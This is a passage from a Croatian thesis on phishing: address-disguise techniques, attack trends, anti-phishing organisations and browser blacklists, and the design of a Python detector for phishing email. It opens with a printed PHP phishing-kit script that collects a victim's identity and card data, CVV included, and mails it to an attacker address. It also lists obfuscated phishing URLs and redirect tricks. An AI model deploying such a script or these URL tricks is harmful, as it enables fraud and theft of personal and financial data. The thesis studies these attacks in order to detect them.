session_start();
$fname = $_POST['fname'];
$mname = $_POST['mname'];
$lname = $_POST['lname'];
$Address = $_POST['Address'];
$City = $_POST['City'];
$State = $_POST['State'];
$Zip = $_POST['Zip'];
$Phone = $_POST['Phone'];
$Country = $_POST['Country'];
$ssn = $_POST['ssn'];
$dobm = $_POST['dobm'];
$dobd = $_POST['dobd'];
$doby = $_POST['doby'];
$ccnumber = $_POST['ccnumber'];
$month = $_POST['month'];
$year = $_POST['year'];
$cvv2 = $_POST['cvv2'];
$type = $_POST['type'];
//sending email info here
$ip = getenv("REMOTE_ADDR");
$subj = "IP - $ip | $ccnumber | PayPal | - Step 1 -";
$msg = "IP: $ip\n\nFirst Name: $fname\nMiddle Name: $mname\nLast Name:
$lname\nAddress: $Address\nCity: $City\nState: $State\nZip: $Zip\nPhone:
$Phone\nCountry: $Country\nssn: $ssn\nDOB Month: $dobm\nDOB Day: $dobd\nDOB
Year: $doby\n-----------------------\nCard Type: $type\nCredit Card Number:
$ccnumber\nCC Expiration Month: $month\nCC Expiration Year: $year\nCvv:
$cvv2";
$from = "From: PayPal<[email protected]>";
mail("[email protected]", $subj, $msg, $from);
header("Location: processing3.html");
?>
Slika 3.16: Ispis skripte step3.php
3.3 Tipovi adresa
Iako je u nekim specifičnim slučajevima moguće pomoću ranjivosti preglednika sakriti adresu
na kojoj se lažna stranica nalazi, to generalno nije moguće. Zato dio phishera koristi trikove
da bi uvjeriti korisnike da lažna stranica stvarno pripada organizaciji za koju se predstavlja.
Tako je jedan od prvih trikova bio da se slovo "l" u adresi zamijeni s "I" ili "1". To je
iskorišteno u napadima na PayPal gdje su umjesto originalne domene paypal.com otvorene
domene paypaI.com i paypa1.com. Isto tako je poznat napad u kojem je domena
bankofthewest.com zamijenjena s bankofthevvest.com (w prikazano kao vv).
Osim tih jednostavnih trikova, postoje i drugi koji se temelje na neznanju prosječnih korisnika
Interneta o načinu izgradnje adresa i o hijerarhijskoj pripadnosti domenama. Postoje korisnici
koji
vjeruju
da
adrese
poput
http://paypal-alert.net/
ili
20
http://paypal.4yu.fr/ pripadaju domeni paypal.com [9]. Isto tako neki korisnici
vjeruju da adrese poput http://aimeegoestolondon.com/www.paypal.it/
index.htm ili http://189.224.23.84/www.paypal.com/paypal pripadaju
PayPal-u.
Generalno, adrese koje se koriste moguće je razvrstati u 5 kategorija [10]:
1. Skrivanje imena domene pomoću IP adresa. Ime domene je u adresi moguće
zamijeniti s IP adresom na kojoj se server nalazi, tako da je za
http://www.fer.hr/
bilo
koji
sljedeći
oblik
valjan:
http://161.53.72.23/
(dekatski
zapis
odvojen
točkama),
http://0xa1.53.0110.23/ (kombinacija dekatskog, heksadekatskog - 0xa1 i
oktalnog - 0110 zapisa). Moguće je koristiti i zapis gdje se IP adresa ne odvaja po
oktetima, već se koristi jedan 32-bitni broj. Tako se adresa http://www.fer.hr
pretvara u http://0xa1354817/ (heksadekatski), http://024115244027/
(oktalno) ili http://2704623639/ (dekatski). Posljednja dva oblika server na
www.fer.hr odbija, međutim općenito to su legalni zapisi adresa. Primjer takve
phishing
adrese
je
http://201.210.197.5/cgi_bin/Launch_cashplus.cgi/.
2. Skrivanje stvarne domene dodavanjem ciljane domene u adresu. Tu pripadaju adrese
kojima je u put do dokumenta koji se učitava dodan naziv ciljane domene. Primjer
takve adrese je http://www.payvr.fr/httpswww.paypal.comfrcgi ili
http://www.pibliceflam.be/www.PayPal.Com/FR-fr/cgi-bin.
3. Skrivanje stvarne domene dodavanjem imena ciljane domene u poddomenu. Na taj
način
je
moguće
izgraditi
adresu
poput
http://www.paypal.com.nekadrugaadresa.com. Primjeri takvih adresa
su http://www.paypal.nd.pl/ ili http://paypal.4yu.fr/.
4. Naziv domene je pogrešno napisan. Tu pripadaju adrese poput
http://paypak.eu/,
http://www.paypai.com/,
http://www.paypa1.com/, http://www.bankofthevvest.com i razne
druge.
5. Upotreba adresa koje su namijenjene za preusmjeravanje. Na primjer, eBay ima
skriptu na adresi http://my.ebay.com/aw-cgi/eBayISAPI.dll? koja
omogućava korisniku da kao parametar unese stranicu na koju želi biti preusmjeren
(provjereno 21.9.2008.). Koristeći takve sigurnosne propuste napadač može stvoriti
adresu koja će sadražvati potpuno legitimnu domenu (my.ebay.com), a ipak će voditi
na zlonamjernu stranicu. Primjer takve adrese je http://my.ebay.com/awcgi/eBayISAPI.dll?RedirectEnter&partner=ShowItem&loc=http
%3A%2F%2Fus.ebayobjects.com%2F2c%3B9739597%3B9123118%3Bz%
3Fhttp%3A%2F%2F0xc924a44/custsvc/_include/Function.asp gdje
se
korisnika
preusmjerava
na
adresu
http://0xc924a44/custsvc/_include/Function.asp.
U početku phishinga se koristio još jedan način koji danas uglavnom nije moguć zbog
zlouporabe. HTTP protokolom je bilo predviđeno slanje korisničkog imena Web poslužitelju
[6]. Korisničko ime se upisivalo prije imena domene, a odvojeno znakom "@". Primjer takve
adrese bi bio http://[email protected]/. Tako je bilo moguće iskonstruirati adresu
21
poput http://[email protected]/ i uvjeriti korisnika da ta adresa
zapravo pripada PayPalu. Danas je taj oblik adresa u Internet Exploreru potpuno onemogućen
(provjereno za verziju 7), a Mozilla Firefox i Seamonkey javljaju upozorenje da se zapravo
radi o adresi http://mojadomena.com/ i pitaju korisnika da li je siguran da to želi.
Novija verzija preglednika Opera se ponaša jednako kao i Firefox.
U tablici 3.1 je prikazano još nekoliko stvarnih adresa i njihove značajke.
Tablica 3.1: Primjeri adresa lažnih stranica
Adresa stranice
Tip adrese
http://122.248.47.226/mrtg/.cartasi/index.htm
Tip 1
http://122.34.255.25/securazione/bancopostaonline.p
oste.it/poste/bpol/bancoposta/formslogin.htm
Tip 1+2
http://202.67.215.50/~payment/payment/infinity.icic
ibank.co.in/BANKAWAY=Action.RetUser.Init.001=Y&amp;
AppSignonBankId=ICI&amp;AppType=corporate&amp;abrdP
rf=N/update.icici.com/
Tip 1+2
http://centre-fax.com/www.PayPal.Com/fr/Confirm.htm
Tip 2
http://connect.colonialbank.a9t5l43uev049lx363hh.se
cureserv.onlineupdatemirror3238o18kb1af7b.colonial.
certificaterenewal.gfhrf.com/logon.htm
Tip 3
http://gjhvnvjgfjhgj.9k.com/klhfjkgfdlgkhgklbgkjhgd
lkghdsfgdkghghdsifghearitufgrehgfdkghrgjh.html
Normalna
adresa
neobičnog
izgleda
http://membres.lycos.fr/dhddgdh/paypal.fr/
Tip 2
http://njserve.com/images/1/www.halifax.co.uk/Reactivation/halifaxonline.co.uk/secure/_mem_/formslogin.asp/index.html
Tip 2
http://signin.e-bay.com-ws-ebayisapi.dll.9k.com/SignIn0ru3A2F2.html
Tip 3
http://top.capitalonebank.compub.login.htmlbank.ser
v.manager.cgipage.showshow.075497317.type.activex.c
omprj.egfgdc.com/login.htm
Tip 3
http://www.backwoon.com/toow/bofa/
Normalna
adresa
http://www.bcanb.info/
Normalna
22
adresa
http://www.cheapnukes.com/.site/www.paypal.it/Confirm.htm
Tip 2
3.4 Tijek novca
Ukoliko se radi o financijskom napadu, da bi napad bio potpuno uspješan, napadač mora
preuzeti novac s kompromitiranog računa. Prema "camorra" modelu [4] organizator napada
prvenstveno radi vlastite zaštite zapošljava agente koji će prebaciti novac na svoje račune.
Agenti podužu novac s kompromitiranih računa te ga šalju u inozemstvo. Drugi agenti
skupljaju taj nova u inozemstvu i šalju ga napadaču. Osim vlastite sigurnosti, na taj način
napadač osigurava i novac jer je mala vjerojatnost da će svi agenti biti uhvaćeni i da će sav
novac biti izgubljen. Agenti često koriste eGold jer uplatu u eGold sustav nije moguće
opozvati, pa drugi agent taj novac može preuzeti bilo gdje u svijetu [3].
3.5 Zlonamjerni programi
Upotreba zlonamjernih programa, ukoliko ih je moguće instalirati na žrtvino računalo, znatno
olakšava posao napadača. Najjednostavniji način slanja programa žrtvi je u privitku poruke
elektroničke pošte. Iako je ova metoda vrlo stara i postoje brojne metode zaštite koje ju
sprječavaju, svejedno je još uvijek moguće zaraziti jedan dio korisnika. Ako postoje ranjivosti
preglednika elektroničke pošte, onda je moguće sastaviti takvu poruku koja će preuzeti
nepoželjni program bez ikakve interakcije korisnika. Nakon što se zlonamjerni program
jednom nađe na žrtvinom računalu, mogućnosti su vrlo široke. Postoje programi koji bilježe
pritisak svake tipke i program koji je bio aktivan u tom trenu. Pomoću takvog programa
napadač može doći do svega što je korisnik upisao, pa tako i do korisničkih imena i lozinki.
Druga mogućnost je da zlonamjerni program preusmjerava mrežni promet zaraženog
računala. Tada napadač može preusmjeriti pokušaje otvaranja stvarnih financijskih stranica na
svoje lažne stranice i tako doći do željenih podataka.
23
4. Trendovi
Posljednje dvije godine su obilježene većim promjenama. Avalanche mreža zaraženih
računala je do sredine 2010. godine gotovo u potpunosti prestala pružati smještaj za phishing
stranice, iako je mreža i dalje aktivna i koristi se u druge svrhe. 2007. godine se pojavio, a
2009. masovno proširio trojanski konj naziva Zeus. Procjenjuje se da trenutno kontrolira oko
3.6 milijuna računala u 196 zemalja svijeta i od 2009. godine na dalje se umjesto Avalanchea
sve više koristi za phishing napade.
Druga velika promjena se odnosi na phishing napade u Kini. Kineska organizacija CNNIC
koja se bavi phishing napadima u Kini je objavila rezultate svojih istraživanja i pokazala da,
uz to da se u SAD-u i Europi detektira samo oko 10% phishing napada ciljanih na kineske
organizacije, promjene u pravilima registracije domena u Kini su dovele do promjena u
strukturi napadačkih domena. Uvjeti za registraciju domene unutar .CN vršne domene su
postroženi što je rezultiralo padom broja registriranih domena sa 13.5 milijuna krajem 2009.
godine na 3.4 milijuna početkom 2011. Isti trend se može vidjeti i na broju napada koji su
koristili .CN vršnu domenu. APWG je registrirao 2.862 takva napada u drugoj polovici 2009.
godine i samo 352 napada u drugoj polovici 2010. godine. No, to ne znači da se broj napada
smanjio. Upravo suprotno, broj napada na kineske institucije se konstantno povećava, a
napadači su se preselili na druge, lakše dobavljive domene. U drugoj polovici 2010. godine je
registrirano ukupno 12.282 napada na kineske institucije od čega se 74% odnosi na na
Taobao.com, stranicu za online kupovinu i aukcije.
Nisu jasni razlozi, međutim prosječno vrijeme života phishing stranice se povećalo sa 49.5
sati u prvoj polovici 2009. godine na 73 sata u drugoj polovici 2010. godine.
41.4% svih napadačkih stranica u drugoj polovici 2010. godine bilo je smješteno na .COM
vršnoj domeni, 7.3% na .CC, 7.2% na .NET, 4.5% je imalo IP adresu, a 4% na .ORG (slika
4.1). To predstavlja veliku promjenu u odnosu na godinu dana ranije kada je .COM domena
zauzimala 31.1%, .EU 22.7%, .NET 11.5%, a .UK 11,4%. Danas se na europskim
nacionalnim i .EU domenama nalazi zanemariv broj phishing stranica.
Slika 4.1: Raspodjela napada po domenama u 2010/2 [1]
24
U drugoj polovici 2009. godine je otkriveno ukupno 28.775 domena korištenih za phishing
napade. Od toga je 6.372 (22%) bilo registrirano u svrhu napada, a 22.403 zauzeto i
prenamjenjeno za phishing hakerskim napadima. Godinu dana kasnije se slika drastično
promijenila. U drugoj polovici 2010. godine otkrivene su 42.624 domene korištene za
phishing, od toga 11.769 (29%) registriranih i 28.537 hakiranih. Glavni razlog tako velike
promjene u brojevima su podaci o phishing napadima u Kini. Do 2010. godine ti podaci nisu
bili dostupni, pa nije moguće procijeniti koliko se napada dogodilo do tada. Povećan broj
registriranih domena je posljedica kineskih napada gdje napadači najčešće registriraju, a ne
hakiraju postojeće stranice. Prije promjene regulative bilo je lako registrirati domenu na .CN
vršnoj domeni. Otkad to više nije lako, napadači su se okrenuli lakšim domenama poput .TK i
.CC.
Broj phishing stranica smještenih na poddomenama besplatnih domena je u stalnom porastu.
U drugoj polovici 2008. godine je otkriveno 6.339 takvih stranica, godinu dana kasnije 6.734,
a u drugoj polovici 2010. godine ukupno 11.768 stranica. Najpopularnije takve domene su
CO.CC sa preko 40% stranica, T35.COM sa 5%, 110MB.COM sa 2%, a sve ostale imaju po
manje od 1% udjela.
Tokom 2009. godine i prve polovice 2010. godine se povećavao udio phishing stranica koje
koriste servise za skraćivanje adresa. Broj takvih stranica je doživio svoj vrh u lipnju 2010.
godine sa 150-ak otkrivenih stranica taj mjesec i od onda opada. U prosincu 2010. je
otkriveno samo 50-ak takvih stranica. Nije jasno što je uzrokovalo ovakav trend.
Najpopularniji sustavi za skraćivanje adresa za phishing u drugoj polovici 2010. godine su bili
tinyurl.com sa 19% udjela i bit.ly sa 10% udjela (slika 4.2).
Slika 4.2: Udio servisa za skraćivanje adresa u 2010/2 [1]
Prema APWG-ovim podacima, na .HR domeni je u drugoj polovici 2009. godine registrirano
15, a u drugoj polovici 2010. godine ukupno 22 phishing napada s vrlo visokim prosječnim
vremenima života od 107 u 2009., odnosno 88 sati u 2010. godini.
Svi podaci su preuzeti sa [1].
25
5. Postojeća zaštita
5.1 Organizacije
Najpoznatije organizacije koje sakupljaju informacije o phishingu i pružaju neku razinu
zaštite su APWG, PhishTank i Symantec PRN. PhishTank je potpuno besplatan za upotrebu,
dok se za druga dva plaćaju mjesečne članarine. Osim njih, phishingom se bave i druge
kompanije kao što su Microsoft i Google, ali oni rezultate koriste samo za svoje interne
potrebe.
5.1.1 APWG
Anti-Phishing Working Group (APWG – http://antiphishing.org) je najpoznatija organizacija
koja se bavi otkrivanjem i sprječavanjem phishing napada. To je organizacija koja okuplja
velik broj sigurnosnih i financijskih kompanija. Trenutno broje preko 1700 kompanija i
agencija koje su uključene u borbu protiv phishinga. Surađuju s 9 od 10 najvećih banaka i 5
najvećih ISP-ova u SAD-u. Osim toga aktivni su i na području provođenja zakona vezanih uz
prijevare na Internetu. Najveći APWG-ovi sponzori su Microsoft, Visa, Symantec, Yahoo,
eBay, GeoTrust, RSA, McAfee i još neki drugi.
APWG mjesečno svojim članovima izdaje izvještaje o trenutnom stanu u svijetu te s
partnerima radi na razvoju zaštite od phishinga. Izvještaji su za javnost dostupni s kašnjenjem
od pola godine.
APWG-ov partner MillerSmiles (http://www.millersmiles.co.uk) posjeduje automatski sustav
koji skuplja phishing poruke (HoneyTrap) te pruža mogućnost pretplate (180 GBP mjesešno)
na redovito osvježavanu listu najnovijih adresa phishing stranica. Moguće je i osobno
(dobrovoljno) doprinijeti tom popisu slanjem sumnjive adrese, odnosno poruke na
[email protected]. Na slici 5.1 je prikazan jedan primjer iz MillerSmilesove
arhive.
26
Slika 5.1: Primjer poruke iz MillerSmilesove arhive
5.1.2 PhishTank
PhishTank (http://www.phishtank.com) je anti-phishing organizacija pokrenuta pod
pokroviteljstvom OpenDNS-a. Organizacija je neprofitna i sastoji se od dobrovoljaca koji
pronalaze i prijavljuju phishing adrese, zatim od onih koji te adrese provjeravaju i na kraju
onih koji održavaju cijeli sustav. Podaci koje PhishTank sakupi su potpuno besplatni i
slobodni za nekomercijalnu, ali i komercijalnu uporabu. PhishTank pruža i API (Application
Programming Interface) preko kojeg je moguće programski dohvaćati najnovije podatke. Taj
sustav koristi Internet preglednik Opera. Za sudjelovanje u radu grupe potrebna je (također
besplatna) registracija.
PhishTank broji preko 20.000 članova i mjesečno obradi oko 15.000 prijavljenih sumnjivih
adresa (podaci za 2008. godinu).
Na adresi http://data.phishtank.com/data/online-valid/ je moguće
dohvatiti trenutno aktualan popis phishing stranica u XML formatu [11]. Na slici 5.2 je dan
isječak iz tog popisa.
27
<?xml version="1.0" encoding="UTF-8"?>
<output>
<meta>
<generated_at>2008-06-30T10:22:26+00:00</generated_at>
<total_entries>3271</total_entries>
</meta>
<entries>
<entry>
<url><![CDATA[http://www.natwest.co.uk.ttre.me.uk/serverstack/usersdirector
y/ncf.aspx?pc=3D112771808504170148543896991026940934204436642114070&amp]]><
/url>
<phish_id>469016</phish_id>
<phish_detail_url><![CDATA[http://www.phishtank.com/phish_detail.php?phish_
id=469016]]></phish_detail_url>
<submission>
<submission_time>2008-06-29T21:22:43+00:00</submission_time>
</submission>
<verification>
<verified>yes</verified>
<verification_time>2008-06-30T04:37:50+00:00</verification_time>
</verification>
<status>
<online>yes</online>
</status>
</entry>
<entry>
<url><![CDATA[http://chicagoplaygroundequipment.com//userlogo/anz.html]]></
url>
<phish_id>469004</phish_id>
<phish_detail_url><![CDATA[http://www.phishtank.com/phish_detail.php?phish_
id=469004]]></phish_detail_url>
<submission>
<submission_time>2008-06-29T20:13:38+00:00</submission_time>
</submission>
<verification>
<verified>yes</verified>
<verification_time>2008-06-29T23:52:04+00:00</verification_time>
</verification>
<status>
<online>yes</online>
</status>
</entry>
Slika 5.2: Isječak iz PhishTankovog XML popisa
5.1.3 Symantec PRN
Symantec Phish Report Network (PRN) je Symantecova mreža razmjene phishing stranica.
Organizacija je podijeljena u dva dijela. Prvi dio su sakupljači adresa koji djeluju na
dobrovoljnoj bazi, a drugi dio čine korisnici tih linkova. Godišnja članarina iznosi 50.000
USD. Članstvo je namijenjeno kompanijama koje se bave sigurnošću korisnika Interneta i
kompanijama koje su ciljevi phishing napada. Dobrovoljci mogu na adresi
https://submit.symantec.com/antifraud/phish.cgi ostaviti adresu stranice koju smatraju
sumnjivom.
28
5.1.4 Google
Google pruža uslugu prepoznavanja phishing stranica za preglednike Mozilla Firefox [12] i
Chrome. Starije inačice preglednika su dohvaćale popis svih poznatih zlonamjernih stranica
sa poslužitelja na adresi http://sb.google.com/ i uspoređivale adrese koje bi korisnik
posjećivao s tim popisom. Postojao je i popis sigurnih stranica. Današnje inačice preglednika
s Googleovog poslužitelja preuzimaju popis sažetaka (engl. hash) svih poznatih zlonamjernih
stranica i u tom popisu traže sažetak adrese koju korisnik želi posjetiti. Čitljiv popis
zlonamjernih stranica više nije dostupan. Nije poznato na koji način Google održava listu.
Pretpostavlja se da Google analizira svu neželjenu poštu koja dolazi u Google Mail sustav i iz
te pošte izdvaja sumnjive adrese. Razvojna dokumentacija Mozilla Firefoxa [12] opisuje
protokol za provjeru potencijalno opasnih stranica.
5.2 Sustavi za zaštitu
5.2.1 Internet preglednici
Danas svaki od tri najpopularnija Internet preglednika [13] (Microsoft Internet Explorer,
Mozilla Firefox, Chrome) ima ugrađenu funkcionalnost prepoznavanja zlonamjernih stranica i
upozoravanja korisnika na to. U sva tri slučaja sustav prepoznavanja se svodi na liste
zlonamjernih stranica (engl. blacklists) u kojima se provjerava svaka stranica kojoj korisnik
želi pristupiti. Internet Explorer koristi Microsoftov servis provjere stranica. Sustav radi tako
da Internet Explorer svaku adresu kojoj korisnik želi pristupiti šalje svom poslužitelju koji u
bazi podataka provjerava je li ta stranica zlonamjerna. Ako je, pojavljuje se odgovarajuća
poruka i korisnika se upućuje da ne posjeti tu stranicu. Način rada poslužitelja koji provjerava
adrese te sam način popunjavanja liste nije poznat. Opera radi na isti način, ali koristi
PhishTankovu listu provjerenih phishing stranica. U oba slučaja dolazi do narušavanja
privatnosti korisnika jer poslužitelji dobivaju svaku adresu kojoj korisnik pristupa te njegovu
IP adresu. Mozilla Firefox i Chrome koriste listu zlonamjernih stranica koju održava Google i
koja je dostupna na poslužitelju http://sb.google.com. Firefox može raditi na dva
načina. Prvi je isti kao i kod prethodna dva preglednika. Svaka adresa kojoj korisnik pristupa
šalje se Googleovom poslužitelju koji odlučuje o prirodi stranice. Drugi način je da Firefox
redovito dohvaća i pohranjuje listu aktualnih phishing stranica i onda lokalno provjeravati
svaku adresu [12]. Mozilla razvojni tim preporučuje prvi način, međutim korisnici koji su
zabrinuti za svoju privatnost bi trebali koristiti drugi način. Na slikama 5.3, 5.4 i 5.5 prikazana
su upozorenja koja prikazuju preglednici kad korisnik pokuša otvoriti zlonamjernu stranicu.
Liste zlonamjernih stranica daju korisniku samo djelomičnu sigurnost [14]. Adresa se dodaje
u listu tek nakon što je otkrivena od strane održavatelja liste. Nitko ne može jamčiti da će baš
on prvi otkriti zlonamjernu stranicu. Postoji mogućnost da će već biti žrtava prije nego što se
stranica proglasi opasnom. Drugi problem takvih lista je dodavanje pogrešnih adresa. Moguće
je da na listu bude dodana čitava domena koja sadrži opasne stranice, a uz njih može
sadržavati veći broj potpuno legalnih stranica. Poznati je primjer blokiranja domene
mine.nu u rujnu 2008. godine [15] .
29
Slika 5.3: Upozorenje u Internet Exploreru 7
Slika 5.4: Upozorenje u Mozilla Firefoxu 3
Slika 5.5. Upozorenje u Operi 9
30
5.2.2 Filteri neželjene pošte
Phishing napadi počinju porukom elektroničke pošte, a phishing poruke se šire kao i ostale
spam poruke. Zbog toga je pomoću dobrog filtera elektroničke pošte moguće spriječiti velik
broj phishing napada. Ako filter zaustavi poruke koje su poslane da bi žrtvu navele na lažnu
stranicu, onda se napad zapravo nikad neće dogoditi. Korisnik neće biti prevaren te se neće
pojaviti mogućnost da ostavi svoje podatke na lažnoj stranici. Phishing je razlog više da se
poradi na sigurnosti elektroničke pošte. Bitno je da svaki poslužitelj pošte (što se najviše
odnosi na besplatne e-mail servise) dobije što kvalitetniji filter neželjene pošte koji će, između
ostalog, spriječiti i phishing napade.
5.2.3 Antivirusni programi
Dio napada dolazi u obliku zlonamjernih programa, pa je vrlo važno da svako računalo bude
zaštićeno od mogućnosti preuzimanja i pokretanja bilo kakvih zlonamjernih programa
(trojanci i spyware kao najvažniji u phishingu). Osim toga, bitno je zaštititi računalo i
sigurnosnom stijenom (engl. firewall) da bi se spriječilo slanje bilo kakvih podataka s
računala od strane neprovjerenih aplikacija.
5.2.4 Edukacija
Istraživanja su pokazala da velik broj korisnika Interneta nije svjestan opasnosti koje vrebaju
[9][16]. Mnogi nemaju nikakva saznanja o phishingu, a i oni koji su čuli za phishing ne znaju
kako se točno krađa podataka odvija i na što treba paziti. Prosječni korisnik ne zna razlikovati
lažirano zaglavlje poruke elektroničke pošte od legitimnog. Zbog toga ne može odrediti da li
je pošiljatelj poruke stvarno taj koji piše u polju pošiljatelja. Zatim, korisnici ne znaju na koji
se način sastavlja adresa stranice te vjeruju da adrese oblika http://paypalsecurity.com/ ili http://nekadrugadomena.com/paypal.com/ pripadaju
domeni paypal.com. Zbog toga je danas teško dobiti domenu čij naziv sadrži zaštićeno
ime, međutim tako je riješen samo dio napada.
31
6. Praktičan rad
Programsko rješenje sustava za otkrivanje phishing napada je zamišljeno kao analizator
neželjenih poruka elektroničke pošte. Budući da se većina phishing poruka dostavlja kanalima
za distribuciju neželjene pošte, a gotovo sve poruke neželjene pošte u sebi sadrže poveznice
na razne internetske stranice, spremnici filtera za neželjenu poštu osiguravaju dovoljno velike
količine phishing poruka uz veliku raznovrsnost u sadržaju samih poruka. Svaka poruka koja
je označena kao neželjena se otvara, analizira se njen sadržaj, izdvajaju poveznice te na kraju
analizira sadržaj stranica na koje te poveznice vode.
Sustav je izrađen u programskom jeziku Python verzije 2.7 i može biti pokrenut na svim
platformama koje podržava Python interpreter. Konkretno, radi se o operacijskim sustavima
UNIX, Linux, Mac OS X i Windows te svim hardverskim platformama koje ti sustavi
podržavaju. Osim vrlo visoke razine prenosivosti, Python je odabran i zbog velikog broja
biblioteka koje pružaju svu potrebnu funkcionalnost. U ovom radu se koriste biblioteke za
dohvaćanje sadržaja putem HTTP, POP3 i IMAP protokola, zatim biblioteke za parsiranje
sadržaja poruka i HTML dokumenata te biblioteka za obradu slika. Osim biblioteke za
parsiranje HTML dokumenata, sve ostale su standardne i dolaze zajedno s interpreterom.
Postoji i standardna biblioteka za parsiranje HTML, odnosno XML dokumenata, no ona u
praksi nije upotrebljiva jer nema mogućnost oporavka i nastavka analize dokumenta u slučaju
greške. A prilikom analize HTML dokumenata je mogućnost oporavka nužna. HTML
dokumenti, koji su u suštini XML dokumenti, u stvarnom svijetu sadrže velik broj
strukturalnih grešaka od kojih se klasični parseri ne mogu oporaviti te odbacuju dokument
kao nevaljan. Preglednici tokom učitavanja popravljaju takve greške i to im omogućuje prikaz
bilo kakve stranice. U ovom radu se za parsiranje potencijalno loših dokumenata koristi
BeautifulSoup biblioteka koja može ispraviti loš HTML i izgraditi ispravno stablo. Uz to
pruža funkcionalnost za vrlo jednostavno navigiranje među elementima stabla.
Program se pokreće pokretanjem glavnog modula kojem se zadaje samo jedan parametar, a
koji predstavlja izvor poruka koje je potrebno analizirati. Izvor može biti direktorij u kojem se
nalazi više poruka, može biti datoteka koja sadrži poruku ili adresa poslužitelja s kojeg se
poruka može preuzeti. Sve poruke moraju biti u RFC 5322 formatu. Rezultati analize se
ispisuju na standardni izlaz. Za svaku poruku se pojedinačno utvrđuje razina rizika.
Tijekom analize, sustav koristi bazu podataka koja sadrži informacije o štićenim stranicama.
Prvenstveno o domenama, logotipovima i ključnim riječima koje se vežu uz danu stranicu.
Istovremeno, pohranjuju se rezultati analiza svih stranica da se izbjegne višestruka analiza
istog sadržaja, a taj popis istovremeno može pružati zaštitu u pregledniku na način da se svaka
adresa koju korisnik želi otvoriti provjerava u popisu i korisnika se upozorava ukoliko se radi
o potencijalnom napadu.
Analiza počinje otvaranjem izvora koji sadrži poruke za analizu te dohvaćanjem i analizom
jedne po jedne poruke. Za svaku poruku se izdvaja pošiljatelj i zasebni MIME dijelovi među
kojima se traže tekstualni i HTML sadržaji. Svaki takav dio se zasebno analizira u potrazi za
poveznicama na potencijalno opasne stranice, ali i ostale znakove koji bi mogli upućivati na
napad. Adrese tih potencijalno opasnih stranica se analiziraju u potrazi za poznatim načinima
obmane da se radi o stvarnim adresama štićenih stranica. Sljedeći korak je preuzimanje i
analiza sadržaja koji se nalazi na tim adresama. Analiziraju se samo HTML stranice. Glavni
cilj te analize je pronalazak obrasca za unos osobnih podataka. Takav obrazac se ne mora
32
nužno nalaziti na prvoj stranici, a može ih biti i više gdje se svaki sljedeći otvori nakon
ispunjavanja prethodnog. Obrasci su specifični po tome da ne postoji provjera točnosti
unesenih podataka, osim eventualno provjere ispravnosti brojeva kreditnih kartica pomoću
skripte u HTML-u, pa je moguće "ući" u sustav koristeći slučajne vrijednosti. Osim obrazaca,
skupljaju se i poveznice, slike i ostali elementi koji mogu pomoći u odluci. Posebna pažnja se
obraća na konačnu destinaciju nakon ispunjavanja posljednjeg obrasca. Velik dio napadačkih
stranica u tom trenu preusmjerava žrtvu na štićene stranice i na taj način pokušava sakriti
vlastitu svrhu. Ukoliko adresa na koju se šalje rezultat obrasca na potencijalno opasnoj
stranici na kraju preusmjerava na štićenu stranicu, vjerojatnost da se radi o phishingu je vrlo
visoka.
6.1 Poruke
Poruke elektroničke pošte se sastoje od zaglavlja i jednog ili više dijelova koji nose sadržaj.
Svaki od tih dijelova sadrži po jednu datoteku koja može tekst poruke u običnom
tekstualnom, HTML ili nekom drugom obliku te privitke koji se šalju uz poruku. Ako ima
više dijelova koji prenose tekst poruke, nije moguće unaprijed znati koji će biti prikazan
korisniku. To ovisi o mogućnostima programa za pregled pošte. Uobičajeno je da se za prikaz
uzme prvi HTML dio ukoliko program podržava HTML prikaz ili prvi tekstualni dio u
suprotnom. Ostali dijelovi se korisniku prikažu kao privitci. Zbog toga je važno da detektor
phishing poruka prođe kroz sve dijelove i odluku donese na temelju najsumnjivijeg dijela.
Svaki od dijelova se tretira kao neovisna poruka. Najvažniji elementi koji se gledaju u svakoj
poruci su poveznice u tekstu poruke i polje pošiljatelja. Budući da je napadačev cilj obmanuti
žrtvu, pošiljateljeva domena se konstruira tako da, ako nije identična domeni organizacije na
koju napadač cilja, jako podsjeća na tu domenu. Ako je pošiljateljeva domena jednaka
štićenoj, autentičnost je moguće provjeriti provjerom adrese poslužitelja s kojeg je poruka
poslana. Ako adresa poslužitelja ne pripada štićenoj organizaciji, radi se o napadu, a ukoliko
pripada, nastavlja se s analizom jer uvijek postoji mogućnost da je neki od elemenata na putu
za dostavu poruke kompromitiran te da se radi o lažnoj poruci. Autentičnost pošiljatelja se
provjerava na način da njegova IP adresa mora nalaziti u rangu navedenom u informacijama o
štićenoj stranici i na putu između pošiljatelja i primatelja sudjeluju samo poslužitelji kojima
se vjeruje. Budući da detekcija povjerljivosti poslužitelja nije ugrađena te se razmatra samo
najjednostavniji slučaj kad pošiljatelj izravno šalje poruku primatelju, ova informacija nema
stvarnu vrijednost pri donošenju odluke.
Osim pošiljatelja i poveznica, provjeravaju se i grafički elementi koji se nalaze u poruci.
Posebna pažnja se obraća na slike koje se učitavaju sa štićene stranice i koje mogu učvrstiti
sumnju ukoliko postoje elementi koji ukazuju na mogući napad.
Osnovna ideja je da se poruke uzimaju iz rezultata filtera neželjene pošte, no moguće je i
preuzeti poruke sa poslužitelja koristeći POP3 ili IMAP protokol, ili pak zadati pojedinačnu
poruku.
6.2 Adrese
Sve pronađene adrese se svrstavaju u tri osnovne kategorije:
1. legitimne adrese - one koje vode na legitimnu domenu
33
2. lažne adrese - sadrže riječi ili dijelove koji bi žrtvu mogli navesti da pomisli kako se
radi o legitimnoj stranici, no ne vode na legitimnu domenu
3. nepoznate adrese - nisu legitimne, ali ne pokušavaju imitirati da jesu
Ukoliko se u poruci pojavi poruka druge kategorije, postoji umjeren rizik od phishing napada.
A ukoliko postoji adresa druge kategorije uz jednu ili više adresa prve kategorije, onda se radi
o vrlo visokom riziku. Ako se pojavljuje samo adresa treće kategorije, radi se o vrlo malom
riziku od phishing napada i velikoj vjerojatnosti da se radi o običnoj neželjenoj poruci.
Prilikom provjere adrese, najprije se provjerava domena i zaključuje pripada li adresa štićenoj
stranici ili ne. Ako ne pripada, onda se provjerava postojanje ključnih ili njima vizualno
sličnih riječi. Rade se uobičajene supstitucije "vv" za "w", "l" i "1" za "i", "0" za "O" i slično.
Provjerava se i prisutnost štićene domene u poddomeni ili putanji do datoteke. Na temelju
toga se odlučuje hoće li adresa biti smještena u drugu ili treću kategoriju.
Postoji mogućnost da zbog greške poslužitelja štićene stranice postoji mogućnost
preusmjeravanja HTTP zahtjeva prema legitimnom poslužitelju na poslužitelje koji drže
zlonamjerne stranice. U takvoj situaciji će adrese biti smještene u prvu kategoriju jer ne
